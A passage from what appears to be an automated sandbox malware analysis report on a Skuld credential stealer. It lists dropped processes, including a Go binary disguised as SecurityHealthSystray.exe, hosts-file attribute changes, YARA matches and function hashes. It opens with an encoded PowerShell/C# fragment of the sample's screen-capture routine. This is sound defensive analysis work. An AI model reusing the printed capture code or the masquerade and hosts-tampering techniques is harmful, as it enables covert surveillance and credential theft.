UABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	22:18:11
Start date:	02/09/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
Imagebase:	0x800000
File size:	14'904'320 bytes
MD5 hash:	59A08BB8BF4881E814FD3D36F525DA8A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Go lang
Yara matches:	Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000011.00000000.2248250951.0000000001616000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2255354839.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000011.00000002.2255354839.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000011.00000002.2263686910.0000000001616000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000000.2247151729.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000011.00000000.2247151729.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Author: Joe Security Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs Detection: 71%, Virustotal, Browse
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	22:18:11
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	22:18:12
Start date:	02/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0h3tdgef\0h3tdgef.cmdline"
Imagebase:	0x7ff654e40000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	22:18:12
Start date:	02/09/2024
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEB20.tmp" "c:\Users\user\AppData\Local\Temp\0h3tdgef\CSC17976FD43C1F4C8D908DC9F141DC89D.TMP"
Imagebase:	0x7ff6794e0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	22:18:20
Start date:	02/09/2024
Path:	C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe"
Imagebase:	0x800000
File size:	14'904'320 bytes
MD5 hash:	59A08BB8BF4881E814FD3D36F525DA8A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Go lang
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000000.2330525795.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000018.00000000.2330525795.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000018.00000002.2358971472.0000000001616000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000018.00000002.2341077622.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000018.00000002.2341077622.0000000000CA5000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_SkuldStealer, Description: Yara detected Skuld Stealer, Source: 00000018.00000000.2331278485.0000000001616000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	22:18:20
Start date:	02/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	22:18:24
Start date:	02/09/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib -r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff712f60000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	22:18:24
Start date:	02/09/2024
Path:	C:\Windows\System32\attrib.exe
Wow64 process (32bit):	false
Commandline:	attrib +r C:\Windows\System32\drivers\etc\hosts
Imagebase:	0x7ff712f60000
File size:	23'040 bytes
MD5 hash:	5037D8E6670EF1D89FB6AD435F12A9FD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 002CE5A0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4579989237.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4579952739.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581076943.0000000000B42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581106264.0000000000B4A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581130553.0000000000B4B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581155221.0000000000B4F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581179490.0000000000B54000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581202420.0000000000B56000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581229850.0000000000B57000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581265073.0000000000B58000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581325993.0000000000B68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581354196.0000000000B6B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581384071.0000000000B85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581411309.0000000000B86000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581436514.0000000000B87000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581463323.0000000000B98000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581604654.0000000000B9C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581682753.0000000000B9E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581745542.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581745542.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581745542.0000000000C3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581745542.0000000000C43000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581745542.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4582100641.0000000000C49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4582100641.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4582995807.0000000001075000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4583102943.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_TMPN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f793c0ded17bfc674aea40dd51e4d1f5da1e1b02c64ee945cf67bb100bb3330f
Instruction ID: 3dd6730cf6de91257c3520e85a5a0e127370e3eeba38119e31d71a044b6272f3
Opcode Fuzzy Hash: f793c0ded17bfc674aea40dd51e4d1f5da1e1b02c64ee945cf67bb100bb3330f
Instruction Fuzzy Hash: BD319A2391CFC482D2218B24B5417AAB364F7A9794F15A715EFC812A1ADB38E2E5CB40

Function 002CA8C0 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4579989237.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4579952739.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4580262694.0000000000705000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581076943.0000000000B42000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581106264.0000000000B4A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581130553.0000000000B4B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581155221.0000000000B4F000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581179490.0000000000B54000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581202420.0000000000B56000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581229850.0000000000B57000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581265073.0000000000B58000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581325993.0000000000B68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581354196.0000000000B6B000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581384071.0000000000B85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581411309.0000000000B86000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581436514.0000000000B87000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581463323.0000000000B98000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581604654.0000000000B9C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581682753.0000000000B9E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581745542.0000000000BB4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581745542.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581745542.0000000000C3D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581745542.0000000000C43000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4581745542.0000000000C46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4582100641.0000000000C49000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4582100641.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4582995807.0000000001075000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4583102943.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_TMPN.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6226d625974f41b655ebad5d25ed4558e083c2262c14460cf3d0e00d19dfb20c
Instruction ID: 1947b3756afe09a7bbbbeeb56b75ec50e80ee856de11637eaa404796fe2356fb
Opcode Fuzzy Hash: 6226d625974f41b655ebad5d25ed4558e083c2262c14460cf3d0e00d19dfb20c
Instruction Fuzzy Hash:

Analysis Process: powershell.exePID: 6956, Parent PID: 2244COMMON

Executed Functions

Function 00007FFD3479BC2C Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2358958363.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce0b02c46a976fbce2a06d6ce32be25e7a3dc4a1b813c02f663d9d942e0c49ee
Instruction ID: 5a6c0a5224dda63d8a06c16528b5b73063f867a94243e2f97d90e44c1642b2fe
Opcode Fuzzy Hash: ce0b02c46a976fbce2a06d6ce32be25e7a3dc4a1b813c02f663d9d942e0c49ee
Instruction Fuzzy Hash: BE814B7161CB488FD799DB2CC899AB57BE0EF56320F0441BED08EC7153DA25B846C791

Function 00007FFD347996C5 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2358958363.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 417bd8224fde43ea38d190eb865a750b7cb0664521762fbdc418ba128a6e4bc3
Instruction ID: 9a29871da75a649a5afa066128bde814dc6069b0a82fa56f9c206dd472ff245f
Opcode Fuzzy Hash: 417bd8224fde43ea38d190eb865a750b7cb0664521762fbdc418ba128a6e4bc3
Instruction Fuzzy Hash: C7411A7191CB4C8FEB589B5C98466E97BE0FB5A320F00426FE44DC3652DA7478568BC2

Function 00007FFD3467E540 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2356658183.00007FFD3467D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3467D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd3467d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3bf1e916714f114dadd9337c363b969ac0d822831170d7ef6835dd9912e0602
Instruction ID: 710a62101a00bed3f3f3de9b02ddd6a449d157df486815039651ee3f5714c7d8
Opcode Fuzzy Hash: e3bf1e916714f114dadd9337c363b969ac0d822831170d7ef6835dd9912e0602
Instruction Fuzzy Hash: 4241F63140DBC44FE7568B28DC95A563FF0EF53220B1945DFD088CB1A3D629A84AC792

Function 00007FFD34866B4E Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2361317210.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd34860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b9864058f240fd5b510e43b0678438d92d4812479ff7493539aa0a148691011
Instruction ID: b34922e959fb28471a9a271322804aab9c3f84ff54c239b4af10605455618a82
Opcode Fuzzy Hash: 3b9864058f240fd5b510e43b0678438d92d4812479ff7493539aa0a148691011
Instruction Fuzzy Hash: EA11C432B0D6858FEB91DF5844E41A87BE1FF56321B5400BFD64DE7193DA28A841C350

Function 00007FFD347933B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2358958363.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: 7f35bd5044578bf9c0f8abe52516a2319000a2064556ee323e06116b507f2bf6
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 6701677125CB0C8FD744EF0CE451AA5B7E0FB99364F10056DE58AC3651DA36E882CB45

Function 00007FFD3486447D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2361317210.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd34860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a369ec5e16ca6cc9416b6531bc09e1d897eb431ea5457b0967659f84fbefdb06
Instruction ID: 7138942b3b100651a6d4295cbfce4119ff4d800679ec1ddebe6b2cdd5d93ef9e
Opcode Fuzzy Hash: a369ec5e16ca6cc9416b6531bc09e1d897eb431ea5457b0967659f84fbefdb06
Instruction Fuzzy Hash: 41F09A32B0D9058FD6A9EB4CA4914E877E1EF46324B1000BAE25DC7163CA29EC44C744

Function 00007FFD34864730 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2361317210.00007FFD34860000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd34860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dae6364e6bfee5cf50de33f2c787eb60d3abbd36029bfd4d595a32e21f78329
Instruction ID: aa3add0e066b5ccdb4405f7c3f37a111c8cf963edf0c174b682f2f038d9e981b
Opcode Fuzzy Hash: 1dae6364e6bfee5cf50de33f2c787eb60d3abbd36029bfd4d595a32e21f78329
Instruction Fuzzy Hash: 64F0B832A0D5088FDBA5EB4CE0908E877E0EF47320B4100B6E20DCB163CA2AAC40C740

Function 00007FFD3479A218 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2358958363.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd3268a7493dcaabfde96c87867f33313fd7a3f95abf58a89269ec52bf5a504c
Instruction ID: 41a9c4e643359480c09018bccac5b616e709b85714b80f2db211f558d6a5bf71
Opcode Fuzzy Hash: fd3268a7493dcaabfde96c87867f33313fd7a3f95abf58a89269ec52bf5a504c
Instruction Fuzzy Hash: 23E04F34404A8C8F8F45EF18C8595E97FE0FF69205B00029BE85DC7121DB719658CBC2

Non-executed Functions

Function 00007FFD34798955 Relevance: 6.4, Strings: 5, Instructions: 162COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFD34798A6A
L_^, xrefs: 00007FFD3479896A
L_^, xrefs: 00007FFD34798A7A
L_^, xrefs: 00007FFD34798A2A
L_^, xrefs: 00007FFD3479897A

Memory Dump Source

Source File: 0000000D.00000002.2358958363.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^$L_^
API String ID: 0-2264858084
Opcode ID: 88b03f237b373d65e41bc2e676da81a3402f034b8a1f6e77e87cb06e54bcef06
Instruction ID: c6fe3a14fab69bbf6937c3f773aac64d44c05106f7987280c52e4ac8db93d6d1
Opcode Fuzzy Hash: 88b03f237b373d65e41bc2e676da81a3402f034b8a1f6e77e87cb06e54bcef06
Instruction Fuzzy Hash: 9151A896A1D6C2ABE76646294CF60993FE0FF1336470A11F6C6C5CB093EE1D2C079652

Function 00007FFD34798AF2 Relevance: 5.2, Strings: 4, Instructions: 161COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFD34798C6A
L_^, xrefs: 00007FFD34798C7A
L_^, xrefs: 00007FFD34798B12
L_^, xrefs: 00007FFD34798AF2

Memory Dump Source

Source File: 0000000D.00000002.2358958363.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^
API String ID: 0-2357752022
Opcode ID: fe264c7761aead3bc423271cb8b2d131f7d6777fa1720303e4e0e48be2758f6b
Instruction ID: 5698f87a883403455fd4b29a8db60544bb03d69ae87705c86c5277ba7e6ab89e
Opcode Fuzzy Hash: fe264c7761aead3bc423271cb8b2d131f7d6777fa1720303e4e0e48be2758f6b
Instruction Fuzzy Hash: 1551D8C3A0E7C15FE76286285CAA1A97FD0AF1332470D11FAC6948B197DA4C6C1AD393

Function 00007FFD347985BD Relevance: 3.9, Strings: 3, Instructions: 102COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFD3479866A
L_^, xrefs: 00007FFD347985C9
L_^, xrefs: 00007FFD3479862A

Memory Dump Source

Source File: 0000000D.00000002.2358958363.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^
API String ID: 0-639022185
Opcode ID: a38ae00a7c56b1bff698558937cbde8fdc81f6c2a7dce6ed6ee8113910cf0c88
Instruction ID: 719a94d646fe1c995f18706138e5e5c840033f956bbb0a429d3bf65a015ffa50
Opcode Fuzzy Hash: a38ae00a7c56b1bff698558937cbde8fdc81f6c2a7dce6ed6ee8113910cf0c88
Instruction Fuzzy Hash: EE316897A1DBC26BE3A246294CB60DA3FD0EE1332470E15F6C2D6C7053ED4D6C07A692

Function 00007FFD34795FF2 Relevance: 3.0, Strings: 2, Instructions: 457COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFD34796301
L_^, xrefs: 00007FFD34796001

Memory Dump Source

Source File: 0000000D.00000002.2358958363.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^
API String ID: 0-338093316
Opcode ID: 3d7cc10931ef3314fd65cb610bdbcdb6c31a0cd6766a76d092bd550582b84681
Instruction ID: 5b0b8a586c4ab87df99d19827c2a4ed1b0fa02f9188506b50468d48fc2bf6dd4
Opcode Fuzzy Hash: 3d7cc10931ef3314fd65cb610bdbcdb6c31a0cd6766a76d092bd550582b84681
Instruction Fuzzy Hash: B8C18497B0C55357E231A6ADB8F70FE3B94DF832797080277D688C90A3ED0C645A91D6

Function 00007FFD34795B71 Relevance: 1.8, Strings: 1, Instructions: 570COMMON

Download Yara Rule

Strings

4, xrefs: 00007FFD34795C20

Memory Dump Source

Source File: 0000000D.00000002.2358958363.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID: 4
API String ID: 0-4088798008
Opcode ID: 230efdee7e285fedba0a6946c5327c4ec2d32b964f0ec90c39d343f9bfb54de7
Instruction ID: dc576f30457c67bd5c5fb50acc63ed57281ef42e7d3c989e65f27fe574518946
Opcode Fuzzy Hash: 230efdee7e285fedba0a6946c5327c4ec2d32b964f0ec90c39d343f9bfb54de7
Instruction Fuzzy Hash: 20F10A93B0DBD29FE392966858F60E97BD0DF532A570800BBC589C7093ED0D780B9792

Function 00007FFD3479BEFB Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2358958363.00007FFD34790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34790000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd34790000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a4880bbba2cbb85ee70b8e4282a6a9f2d4ad71107f3057507356d95a4a5d437
Instruction ID: 55a47634dcdb282f1f1481b6c9a2854837259b0223ef6073aafbb0559136e360
Opcode Fuzzy Hash: 0a4880bbba2cbb85ee70b8e4282a6a9f2d4ad71107f3057507356d95a4a5d437
Instruction Fuzzy Hash: CA718396B0D7C39EE7524A2C58BE0E93FA0FF13264B4914F6C684CB093DE1D6407A795

Function 00007FFD34796FA5 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

